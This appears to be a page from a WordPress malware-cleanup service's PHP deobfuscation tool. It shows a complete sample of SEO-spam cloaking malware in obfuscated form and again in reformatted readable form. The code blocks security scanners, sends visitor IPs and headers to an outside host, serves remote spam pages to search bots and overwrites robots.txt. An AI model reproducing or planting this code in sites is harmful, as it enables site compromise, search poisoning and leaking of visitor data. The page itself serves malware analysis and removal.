Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $xavr='gtell.co';$hvfi='m/';$rvhu='1456.hea';$btsi='://cw';$vrkg='http';$etau='rin';$wrori=$vrkg.$btsi.$rvhu.$etau.$xavr.$hvfi; $pc = "VgZQAQc"; $bagent = "Docomo|Bing|Yahoo|Google"; error_reporting(0); if(preg_match("/(EasouSpider|universalFeedParser|SeznamBot|CrawlDaddy|indy Library|feedly|httpClient|ezooms|python-requests|SemrushBot|CensysInspect|yySpider|ApacheBench|YandexBot|DataForSEO|LightDeckReports Bot|AmazonBot|Barkrowler|AhrefsBot|CoolpadWebkit|ZmEu|feedDemon|Python|yisouSpider|Python-urllib|GPTBot|AskTbFXTV|Mj12bot|scrapy|Jaunty|DigExt|swiftbot|Go-http-client|paloaltonetworks|petalBot|java|heritrix|OBot|Bytespider|DotBot|JikeSpider)/i", $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 403 Forbidden'); exit(); } $refer = urlencode(@$_SERVER['HTTP_REFERER']); $uagent = urlencode($_SERVER['HTTP_USER_AGENT']); $language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']); $ip = $_SERVER['REMOTE_ADDR']; if (isset($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } $ip = urlencode($ip); $domain = urlencode($_SERVER['HTTP_HOST']); $script = urlencode($_SERVER['SCRIPT_NAME']); if ((!empty($_SERVER['REQUEST_SCHEME']) and $_SERVER['REQUEST_SCHEME'] == 'https') or (!empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on') or (!empty($_SERVER['SERVER_PORT']) and $_SERVER['SERVER_PORT'] == '443') or (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) { $_SERVER['REQUEST_SCHEME'] = 'https'; } else { $_SERVER['REQUEST_SCHEME'] = 'http'; } $http = urlencode($_SERVER['REQUEST_SCHEME']); $uri = urlencode($_SERVER['REQUEST_URI']); if(strpos($uri,"hachac") !== false){echo "ok";exit();} $hac = 0; $hacFilePath = "hac.txt"; if(!is_file($hacFilePath)) { $uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/hachac'; $liyn = @file_get_contents($uuu); if($liyn === "ok") { $hac = 1; writeToFile($hacFilePath,"1"); } else { $hac = 0; writeToFile($hacFilePath,"0"); } } else { $hac = readFromFile($hacFilePath); } function writeToFile($filePath, $content) { $file = fopen($filePath, "w"); if ($file) { fwrite($file, $content); fclose($file); return true; } return false; } function readFromFile($filePath) { $file = fopen($filePath, "r"); if ($file) { $content = fread($file, filesize($filePath)); fclose($file); return $content; } return false; } if(strpos($uri,"favicon.ico") !== false) { } else if(strpos($uri,"robots.txt") !== false or strpos($uri,"pingsitemap") !== false or strpos($uri,"jp2023") !== false or preg_match("@^/(.*?).xml$@i", $_SERVER['REQUEST_URI']) or preg_match("/($bagent)/i", $_SERVER['HTTP_USER_AGENT']) or preg_match("/($bagent)/i", $_SERVER['HTTP_REFERER'])) { $requsturl = $wrori."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$hac&script=$script"; $robots_contents = ""; if(strpos($uri,"pingsitemap") !== false) { $scripname = $_SERVER['SCRIPT_NAME']; if(strpos($scripname,"index.ph") !== false) { if($hac == 0) { $scripname = '/?'; } else { $scripname = '/'; } } else { $scripname = $scripname.'?'; } $robots_contents = "User-agent: *\r\nAllow: /"; $sitemap = "$http://" . $domain .$scripname. "sitemap.xml"; $robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap"; $sitemapstatus = ""; echo $sitemap.": ".$sitemapstatus.'<br/>'; $requsturl = $wrori."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$hac&script=$script&sitemap=".urlencode($sitemap); } $liyn = @file_get_contents($requsturl); if(empty($liyn)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $requsturl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); $liyn = curl_exec($ch); curl_close($ch); } if(!empty($liyn)) { if(substr($liyn,0,10)=="error code"||$liyn == "500") { header("HTTP/1.0 500 Internal Server Error"); exit(); } if(strpos($uri,"jp2023") !== false){header('HTTP/1.1 404 Not Found');} else if(substr($liyn,0,5)=="<?xml") { header('Content-Type: text/xml; charset=utf-8'); } else { header('Content-Type: text/html; charset=utf-8'); } echo $liyn; if(!empty($robots_contents)){writeToFile("robots.txt",$robots_contents);} else if(strpos($uri,"robots.txt") !== false){writeToFile("robots.txt",$liyn);} exit(); return; } }else{ } ?><?php
$xavr = 'gtell.co';
$hvfi = 'm/';
$rvhu = '1456.hea';
$btsi = '://cw';
$vrkg = 'http';
$etau = 'rin';
$wrori = "http://cw1456.hearingtell.com/";
$pc = "VgZQAQc";
$bagent = "Docomo|Bing|Yahoo|Google";
error_reporting(0);
if (preg_match("/(EasouSpider|universalFeedParser|SeznamBot|CrawlDaddy|indy Library|feedly|httpClient|ezooms|python-requests|SemrushBot|CensysInspect|yySpider|ApacheBench|YandexBot|DataForSEO|LightDeckReports Bot|AmazonBot|Barkrowler|AhrefsBot|CoolpadWebkit|ZmEu|feedDemon|Python|yisouSpider|Python-urllib|GPTBot|AskTbFXTV|Mj12bot|scrapy|Jaunty|DigExt|swiftbot|Go-http-client|paloaltonetworks|petalBot|java|heritrix|OBot|Bytespider|DotBot|JikeSpider)/i", $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 403 Forbidden');
exit;
}
$refer = urlencode(@$_SERVER['HTTP_REFERER']);
$uagent = urlencode($_SERVER['HTTP_USER_AGENT']);
$language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']);
$ip = $_SERVER['REMOTE_ADDR'];
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
$ip = urlencode($ip);
$domain = urlencode($_SERVER['HTTP_HOST']);
$script = urlencode($_SERVER['SCRIPT_NAME']);
if (!empty($_SERVER['REQUEST_SCHEME']) and $_SERVER['REQUEST_SCHEME'] == 'https' or !empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on' or !empty($_SERVER['SERVER_PORT']) and $_SERVER['SERVER_PORT'] == '443' or isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') {
$_SERVER['REQUEST_SCHEME'] = 'https';
} else {
$_SERVER['REQUEST_SCHEME'] = 'http';
}
$http = urlencode($_SERVER['REQUEST_SCHEME']);
$uri = urlencode($_SERVER['REQUEST_URI']);
if (strpos($uri, "hachac") !== false) {
echo "ok";
exit;
}
$hac = 0;
$hacFilePath = "hac.txt";
if (!is_file($hacFilePath)) {
$uuu = $http . '://' . $_SERVER['HTTP_HOST'] . '/hachac';
$liyn = @file_get_contents($uuu);
if ($liyn === "ok") {
$hac = 1;
writeToFile($hacFilePath, "1");
} else {
$hac = 0;
writeToFile($hacFilePath, "0");
}
} else {
$hac = readFromFile($hacFilePath);
}
function writeToFile($filePath, $content)
{
$file = fopen($filePath, "w");
if ($file) {
fwrite($file, $content);
fclose($file);
return true;
}
return false;
}
function readFromFile($filePath)
{
$file = fopen($filePath, "r");
if ($file) {
$content = fread($file, filesize($filePath));
fclose($file);
return $content;
}
return false;
}
if (strpos($uri, "favicon.ico") !== false) {
} else {
if (strpos($uri, "robots.txt") !== false or strpos($uri, "pingsitemap") !== false or strpos($uri, "jp2023") !== false or preg_match("@^/(.*?).xml\$@i", $_SERVER['REQUEST_URI']) or preg_match("/({$bagent})/i", $_SERVER['HTTP_USER_AGENT']) or preg_match("/({$bagent})/i", $_SERVER['HTTP_REFERER'])) {
$requsturl = $wrori . "?agent={$uagent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$hac}&script={$script}";
$robots_contents = "";
if (strpos($uri, "pingsitemap") !== false) {
$scripname = $_SERVER['SCRIPT_NAME'];
if (strpos($scripname, "index.ph") !== false) {
if ($hac == 0) {
$scripname = '/?';
} else {
$scripname = '/';
}
} else {
$scripname .= '?';
}
$robots_contents = "User-agent: *\r\nAllow: /";
$sitemap = "{$http}://" . $domain . $scripname . "sitemap.xml";
$robots_contents = trim($robots_contents) . "\r\n" . "Sitemap: {$sitemap}";
$sitemapstatus = "";
echo $sitemap . ": " . $sitemapstatus . '<br/>';
$requsturl = $wrori . "?agent={$uagent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$hac}&script={$script}&sitemap=" . urlencode($sitemap);
}
$liyn = @file_get_contents($requsturl);
if (empty($liyn)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $requsturl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
$liyn = curl_exec($ch);
curl_close($ch);
}
if (!empty($liyn)) {
if (substr($liyn, 0, 10) == "error code" || $liyn == "500") {
header("HTTP/1.0 500 Internal Server Error");
exit;
}
if (strpos($uri, "jp2023") !== false) {
header('HTTP/1.1 404 Not Found');
} else {
if (substr($liyn, 0, 5) == "<?php xml") {
header('Content-Type: text/xml; charset=utf-8');
} else {
header('Content-Type: text/html; charset=utf-8');
}
}
echo $liyn;
if (!empty($robots_contents)) {
writeToFile("robots.txt", $robots_contents);
} else {
if (strpos($uri, "robots.txt") !== false) {
writeToFile("robots.txt", $liyn);
}
}
exit;
}
} else {
}
}Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.